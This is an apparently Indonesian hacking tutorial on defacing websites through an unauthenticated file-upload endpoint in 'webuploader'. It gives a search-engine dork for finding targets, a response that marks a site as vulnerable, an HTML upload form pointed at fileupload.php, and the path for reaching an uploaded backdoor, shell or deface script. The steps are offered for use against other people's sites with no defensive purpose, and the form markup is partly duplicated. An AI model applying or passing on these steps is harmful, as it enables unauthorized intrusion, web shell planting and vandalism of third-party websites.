Minasankon'nichiwa
Kali ini saya bakal
bikin Tutorial deface dengan Webuploader File Upload. Lansung saja kita siap
kan bahan bahan nya
1.
Dork
2.
CSRF
3.
PC / HandPhone / Lapotp
4.
Koneksi internet
Kalo sudah siap semua
bahan bahan nya langsung aja saya mulai tutorial nya
Pertama tama dorking
dulu di web search engine contoh:
Google, Bing, yandex dll
Oke langsung aja, buka
browser kalian, terus buka web search engine nya, kalo saya make google aja. Masukin
dork nya, dork saya inurl:/webuploader/server/.
Kalo udah nemu web yeng
menurutmu paling oke buat di ekse langsung gas aja.
Lanjut..
Masukin exploitnya
sekarang
Contoh:http://sayangku.ifa/[path]/webuploader/server/fileupload.php
Kalo vuln ada tulisan {"jsonrpc"
: "2.0", "result" : null, "id" : "id"}
, coba lihat pada gambar
Kalo udah gitu langsung
masukin site nya ke CSRF
<form method="post"
action=" http://sayangku.ifa/[path]/webuploader/server/fileupload.php "
enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="submit" value="submit"/>
</form>
<input type="file" name="file"/>
<input type="submit" value="submit"/>
</form>
kalo saya make CSRF
online (ini juga punya orang) jadi tampilan begini
Kalo sudah langsung aja
klik “Lock!”
Kemudian pilih file
yang mau diupload. Tinggal pilih mau upload backdoor / shell atau script deface
kalian juga gak papa, gak ada yang ngelarang kok.
Kalo sudah tinggal klik
“Upload”. Kemudian tunggu aja sampe selesai uploadnya. Harus sabar jangan grusa
grusu gak baik kalo kayak gitu
Oke lanjut lagi
Kalo sudah sukses
upload kayak gimana ? tandanya apa kalo sudah sukses upload ?
Kalo sudah sukses
upload tandanya sama saja, seperti pada saat melakukan exploit tadi. Tapi ada
juga web yang memberi nama random pada file yang kamu upload tadi.
Akses file nya gimana ?
Untuk akses file begini
caranya
http://sayangku.ifa/[path]/webuploader/server/upload/namafile.php
kalo sudah tingal buka
aja
Selamata mencoba
Tested on: Windows 7
Ultimate